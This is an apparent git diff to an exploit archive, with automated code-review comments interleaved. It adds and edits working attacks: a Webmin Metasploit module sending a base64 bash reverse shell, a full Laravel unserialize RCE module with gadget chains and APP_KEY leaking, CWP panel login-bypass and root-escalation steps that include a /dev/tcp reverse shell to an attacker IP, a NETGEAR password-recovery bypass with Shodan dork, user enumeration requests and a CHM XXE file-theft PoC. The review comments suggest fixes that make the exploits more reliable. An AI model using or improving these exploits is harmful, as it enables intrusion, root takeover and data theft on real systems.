diff --git a/exploits/hardware/webapps/47117.txt b/exploits/hardware/webapps/47117.txt
index dcb7a8a55..5dc1b38e3 100644
--- a/exploits/hardware/webapps/47117.txt
+++ b/exploits/hardware/webapps/47117.txt
@@ -38,22 +38,23 @@ download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS ||
-# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure
# Date: 13/07/2019
# Exploit Author: Wadeek
-# Hardware Version: R6080-100PES
-# Firmware Version: 1.0.0.34 / 1.0.0.40
-# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
-# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+# Hardware Version: JWNR2010v5
+# Firmware Version: 1.1.0.54
+# Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip
+# Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5"
== Files Containing Juicy Info ==
>> http://192.168.1.1/currentsetting.htm
-Firmware=V1.0.0.34WW
-Model=R6080
->> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
-SSSSSSSNNNNNN
+Firmware=V1.1.0.54
+Model=JWNR2010v5
+>> http://192.168.1.1/BRS_netgear_success.html (Serial Number)
+setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000);
-== Security Questions Bypass > Answers Disclosure ==
+== Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
@@ -62,14 +63,14 @@ dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=sec
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
-
-
+
+
(repeat recovery process for get admin password)
== Authenticated Telnet Command Execution ==
>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
-R6080 login: admin
+JWNR2010v5 login: admin
Password: Str0nG-!P4ssW0rD
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
diff --git a/exploits/linux/remote/46984.rb b/exploits/linux/remote/46984.rb
index 96422462b..985a603f1 100755
--- a/exploits/linux/remote/46984.rb
+++ b/exploits/linux/remote/46984.rb
@@ -10,12 +10,11 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
+ 'Name' => 'Webmin Package Updates Remote Command Execution',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
-
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
@@ -23,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
- ['CVE', '2019-'],
+ ['CVE', '2019-12840'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
],
'Privileged' => true,
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
{
'RPORT' => 10000,
'SSL' => false,
- 'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
+ 'PAYLOAD' => 'cmd/unix/reverse_perl'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -63,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
- 'cookie' => 'testing=1',
+ 'cookie' => 'testing=1', # it must be used for "Error - No cookies"
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
@@ -78,32 +77,43 @@ class MetasploitModule < Msf::Exploit::Remote
return nil unless res
''
end
-##
-# Target and input verification
-##
+
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
- # check package update priv
+ # check version
res = send_request_cgi({
- 'uri' => normalize_uri(target_uri.path, "package-updates/"),
- 'cookie' => "sid=#{cookie}"
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
+ 'cookie' => "sid=#{cookie}",
+ 'vars_get' => { "xnavigation" => "1" }
})
- if res && res.code == 200 && res.body =~ /Software Package Update/
- print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
- return CheckCode::Vulnerable
+ if res && res.code == 302 && res.body
+ version = res.body.split("- Webmin 1.")[1]
+ return CheckCode::Detected if version.nil?
+ version = version.split(" ")[0]
+ if version <= "910"
+ # check package update priv
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, "package-updates/"),
+ 'cookie' => "sid=#{cookie}"
+ })
+
+ if res && res.code == 200 && res.body =~ /Software Package Update/
+ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+ return CheckCode::Vulnerable
+ end
+ end
end
- print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
+ print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
-##
-# Exploiting phase
-##
+
def exploit
cookie = login
if cookie == '' || cookie.nil?
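Review bot: The version gate `if version <= "910"` compares two strings lexicographically, so digit strings of different length are ordered by their leading characters rather than by value (a constructed example: "92" sorts after "910" even though 92 < 910); compare numerically instead, `if version.to_i <= 910`. The value comes from `res.body.split("- Webmin 1.")[1]`, so a banner that is not a 1.x release already yields `nil` and falls through to `CheckCode::Detected`, which is the right hedged answer for that case and need not change. The enclosing `check` method ends inside this hunk; `exploit` starts on its last lines and continues outside it.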
@@ -111,43 +121,36 @@ class MetasploitModule < Msf::Exploit::Remote
end
print_good("Session cookie: #{cookie}")
- res = send_request_raw(
+ res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
- 'headers' =>
- {
- 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
- },
- 'cookie' => "redirect=1; testing=1; sid=#{cookie}"
+ 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+ 'cookie' => "sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
- exec(cookie)
-
+ run_update(cookie)
end
- def exec(cookie)
-
- command = payload.encoded
+ def run_update(cookie)
+ @b64p = Rex::Text.encode_base64(payload.encoded)
+ perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+ payload = Rex::Text.uri_encode(perl_payload)
res = send_request_cgi(
{
- 'method' => 'POST',
- 'cookie' => "sid=#{cookie}",
- 'ctype' => 'application/x-www-form-urlencoded',
- 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
- 'headers' =>
- {
- 'Referer' => "#{peer}/package-updates/?xnavigation=1"
- },
- 'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
+ 'method' => 'POST',
+ 'cookie' => "sid=#{cookie}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+ 'headers' =>
+ {
+ 'Referer' => "#{peer}/package-updates/?xnavigation=1"
+ },
+ 'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
})
-
end
-end
-##
-# The end of the adventure (o_O) // AkkuS
-##
\ No newline at end of file
+end
\ No newline at end of file
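Review bot: The local assignment `payload = Rex::Text.uri_encode(perl_payload)` in `run_update` shadows the module's `payload` accessor that the same method reads two lines earlier via `payload.encoded`; it only works because Ruby treats the bare name as a method call until the assignment is lexically seen, which is fragile and hard to read. Rename the local, e.g. `encoded_cmd = Rex::Text.uri_encode(perl_payload)`, and interpolate `#{encoded_cmd}` in the `'data'` string. `@b64p` is read nowhere but inside this method, so it should be a local rather than an instance variable, and `perl_payload` holds a bash command line, so the name is misleading. The `end` lines closing `run_update` and the `MetasploitModule` class are inside the hunk.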
diff --git a/exploits/linux/remote/47129.rb b/exploits/linux/remote/47129.rb
new file mode 100755
index 000000000..54f31f977
--- /dev/null
+++ b/exploits/linux/remote/47129.rb
@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
+ Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
+ an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
+ Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
+ Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
+ In some cases the APP_KEY is leaked which allows for discovery and exploitation.
+ },
+ 'DisclosureDate' => '2018-08-07',
+ 'Author' =>
+ [
+ 'Ståle Pettersen', # Discovery
+ 'aushack', # msf exploit + other leak
+ ],
+ 'References' =>
+ [
+ ['CVE', '2018-15133'],
+ ['CVE', '2017-16894'],
+ ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
+ ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
+ ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultTarget' => 0,
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
+ 'Payload' => { 'DisableNops' => true },
+ 'Targets' => [[ 'Automatic', {} ]],
+ ))
+
+ register_options([
+ OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
+ OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
+ ])
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'GET'
+ })
+
+ # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
+ unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
+ return CheckCode::Unknown
+ end
+
+ auth_token = check_appkey
+ if auth_token.blank? || test_appkey(auth_token) == false
+ vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+ return CheckCode::Detected
+ end
+
+ random_string = Rex::Text.rand_text_alphanumeric(12)
+
+ 1.upto(4) do |method|
+ vuln = generate_token("echo #{random_string}", auth_token, method)
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => "#{vuln}",
+ }
+ })
+
+ if res.body.include?(random_string)
+ return CheckCode::Vulnerable
+ # Not conclusive but witnessed in the wild
+ elsif res.body.include?('Method Not Allowed')
+ return CheckCode::Safe
+ end
+ end
+ CheckCode::Detected
+ rescue Rex::ConnectionError
+ CheckCode::Unknown
+ end
+
+ def env_leak
+ key = ''
+ vprint_status 'Checking for CVE-2017-16894 .env information leak'
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '.env'),
+ 'method' => 'GET'
+ })
+
+ # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
+ return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
+ key = $1
+
+ if key
+ vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
+ return key
+ end
+
+ vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
+ key
+ end
+
+ def framework_leak(decrypt_ex = true)
+ key = ''
+ if decrypt_ex
+ # Possible config error / 0day found by aushack during pentest
+ # Seen in the wild with recent releases
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
+ }
+ })
+
+ return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
+ else
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST'
+ })
+
+ return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
+ end
+ # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
+
+ # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
+ if res.body =~ /\>base64:(.*)\<\/span\>/
+ key = $1
+ vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
+ end
+
+ key
+ end
+
+ def check_appkey
+ key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
+ return key unless key.empty?
+
+ vprint_status 'APP_KEY not set. Will try to find it...'
+ key = env_leak
+ key = framework_leak if key.empty?
+ key = framework_leak(false) if key.empty?
+ key.empty? ? false : key
+ end
+
+ def test_appkey(value)
+ value = Rex::Text.decode_base64(value)
+ return true if value && value.length.to_i == 32
+
+ false
+ end
+
+ def generate_token(cmd, key, method)
+ # Ported phpggc Laravel RCE php objects :)
+ case method
+ when 1
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ when 2
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ when 3
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
+ when 4
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ end
+
+ cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
+ cipher.encrypt
+ cipher.key = Rex::Text.decode_base64(key)
+ iv = cipher.random_iv
+
+ value = cipher.update(payload_decoded) + cipher.final
+ pload = Rex::Text.encode_base64(value)
+ iv = Rex::Text.encode_base64(iv)
+ mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
+ iv = iv.gsub('/', '\\/') # Escape slash
+ pload = pload.gsub('/', '\\/') # Escape slash
+ json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
+ json_out = Rex::Text.encode_base64(json_value)
+
+ json_out
+ end
+
+ def exploit
+ auth_token = check_appkey
+ if auth_token.blank? || test_appkey(auth_token) == false
+ vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+ return
+ end
+
+ 1.upto(4) do |method|
+ sploit = generate_token(payload.encoded, auth_token, method)
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => sploit,
+ }
+ }, 5)
+
+ # Stop when one of the deserialization attacks works
+ break if session_created?
+
+ if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
+ print_status 'Target appears to be patched or otherwise immune'
+ end
+ end
+ end
+end
\ No newline at end of file
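Review bot: `res.body.include?('The MAC is invalid|Method Not Allowed')` in `exploit` looks for the literal string including the `|`, so neither message is ever matched and the "patched or otherwise immune" status never prints; a regex is what was intended, `if res && res.body =~ /The MAC is invalid|Method Not Allowed/`. In `check`, `res.body.include?(random_string)` dereferences `res` without a nil guard while only `Rex::ConnectionError` is rescued, so a request that returns nil raises `NoMethodError` out of `check` instead of producing `CheckCode::Unknown`; `return CheckCode::Unknown unless res && res.body` before that line would close it. The comment `# Or AES-128-CBC - untested` on the `OpenSSL::Cipher.new('AES-256-CBC')` line is at odds with `test_appkey`, which only accepts a 32-byte decoded key, so the comment could state that the key-length check is what pins the cipher choice. The hunk is the whole new file, so the class begins and ends inside it.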
diff --git a/exploits/linux/webapps/47123.txt b/exploits/linux/webapps/47123.txt
new file mode 100644
index 000000000..1e529b047
--- /dev/null
+++ b/exploits/linux/webapps/47123.txt
@@ -0,0 +1,89 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for latest version
+# Version: 0.9.8.836 to 0.9.8.846
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13360, CVE-2019-13605
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product : CWP Control Web Panel
+Vulnerability Name : User panel bypass Login
+version : 0.9.8.836
+Fixed on : 0.9.8.848
+Test on : CentOS 7.6.1810 (Core)
+Reference : http://centos-webpanel.com/
+ : https://control-webpanel.com/changelog
+CVE-Number : CVE-2019-13605
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+After login success, the application will retuens base64 value and use it to authenticate again,
+That allow attacker to modify the response and become a user
+
+# ====================================================================
+# Response format (version 0.9.8.836 to 0.9.8.837)
+# ====================================================================
+
+||//theme/original
+
+
+
+# CVE-2019-13360
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
+# ====================================================================
+
+1. Login with valid username and invalid password
+2. Replace the target username in "||//theme/original"
+3. Convert to base64
+4. Place the base64 value to HTTP response body
+5. Gain access to user area
+
+
+# CVE-2019-13605
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
+# ====================================================================
+
+1. Create a testing environment
+ 1.1 Create user as a target username
+ 1.2 Login as the user
+ 1.3 Save the HTTP response body (token value)
+2. Login to the real target with valid username and invalid password
+3. Place the value we saved from step 1.3 in HTTP response body
+4. Gain access to user area
+
+*The response value format is depends on version, just replace the hole value
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-07: Discovered the bug
+2019-07-07: Reported to vendor
+2019-07-07: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Advisory published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
\ No newline at end of file
diff --git a/exploits/linux/webapps/47124.txt b/exploits/linux/webapps/47124.txt
new file mode 100644
index 000000000..384b18481
--- /dev/null
+++ b/exploits/linux/webapps/47124.txt
@@ -0,0 +1,105 @@
+//====================================================================\\
+|| ||
+|| CWP Control Web Panel 0.9.8.836 - 0.9.8.839 ||
+|| Root Privilege Escalation ||
+|| ||
+\\====================================================================//
+
+# ====================================================================
+# Information
+# ====================================================================
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
+version in the script)
+# Version: 0.9.8.836 to 0.9.8.839
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13359
+
+Product : CWP Control Web Panel
+Vulnerability Name : Root Privilege Escalation
+version : 0.9.8.836
+Fixed on : 0.9.8.840
+Test on : Tested on: CentOS 7.6.1810 (Core)
+Reference : http://centos-webpanel.com/
+ : https://control-webpanel.com/changelog
+CVE-Number : CVE-2019-13359
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+1. The session file are store at /tmp directory
+2. rkey value in the session file dose not change when access by the same source IP address
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+Session prepareation state
+ 1. Check the current IP address of attacker
+ 2. Set the IP address on testing environment network
+ 3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
+ 4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey"
+ 5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)
+
+ * rkey is created from client ip, then do not change client ip when attack the real target
+
+Attack state
+
+ #
+ # Method 1 Uploading via reverse shell
+ #
+
+ 1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
+ 2. Create session file through reverse shell
+
+ echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456
+
+ 3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+ 4. Change file permission "chmod 664 /tmp/sess_123456"
+ 5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+ 6. Open the URL and become the root user
+
+
+ #
+ # Method 2 Uploading via File manager function
+ #
+
+ 1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
+ 2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+ 3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+ 4. Open the URL and become the root user
+
+ *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-06-30: Discovered the bug
+2019-06-30: Reported to vendor
+2019-06-30: Vender accepted the vulnerability
+2019-07-02: The vulnerability has been fixed
+2019-07-06: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/linux/webapps/47125.txt b/exploits/linux/webapps/47125.txt
new file mode 100644
index 000000000..b078c0268
--- /dev/null
+++ b/exploits/linux/webapps/47125.txt
@@ -0,0 +1,119 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
+# Date: 15 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for lastest version
+# Version: 0.9.8.836 to 0.9.8.847
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13383
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product : CWP Control Web Panel
+version : 0.9.8.838
+Fixed on : 0.9.8.848
+Test on : CentOS 7.6.1810 (Core)
+Reference : https://control-webpanel.com/
+CVE-Number : 2019-13383
+
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+The server response different message between login with valid and invalid user.
+This allows attackers to check whether a username is valid by reading the HTTP response.
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+1. Login with a random user by using invalid password
+
+POST /login/index.php?acc=validate HTTP/1.1
+Host: 192.168.80.137:2083
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+csrftoken: d41d8cd98f00b204e9800998ecf8427e
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Connection: close
+Referer: https://192.168.80.137:2083/login/?acc=logon
+
+username=AAA&password=c2Rmc2Rm
+
+
+
+2. Check the HTTP response body
+
+2.1 User does not exist (server response suspended)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:39:06 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 9
+
+suspended
+
+
+2.2 User does exist (server response nothing)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:40:12 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 0
+
+
+
+3. HTTP response body format depends on software version, but all of them keep responding differently as the example below
+
+------------------------------------------------------------
+| Username | Password | Result |
+
+------------------------------------------------------------
+| valid | valid | login success |
+
+| valid | invalid | {"error":"failed"} |
+
+| invalid | invalid | {"error":"user_invalid"} |
+------------------------------------------------------------
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-06: Discovered the bug
+2019-07-06: Reported to vendor
+2019-07-06: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/windows/dos/47127.txt b/exploits/windows/dos/47127.txt
new file mode 100644
index 000000000..6052d2865
--- /dev/null
+++ b/exploits/windows/dos/47127.txt
@@ -0,0 +1,105 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Compiled HTML Help "hh.exe"
+
+Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
+The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
+CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
+
+
+[Vulnerability Type]
+Uncompiled .CHM File XML External Entity Injection
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
+simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
+Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.
+
+Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
+having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
+
+While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
+create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
+
+Note: User interaction is required to exploit this vulnerability.
+
+
+[Exploit/POC]
+1) python -m SimpleHTTPServer
+
+
+2) "XXE.chm.chm"
+
+
+
+
+Uncompiled CHM File XXE PoC
+
+
+
+
+
+
+%dtd;]>
+&send;
+
+
+
+
+
+3) "payload.dtd" (hosted in python web-server dir port 81 above)
+
+
+">
+%all;
+
+
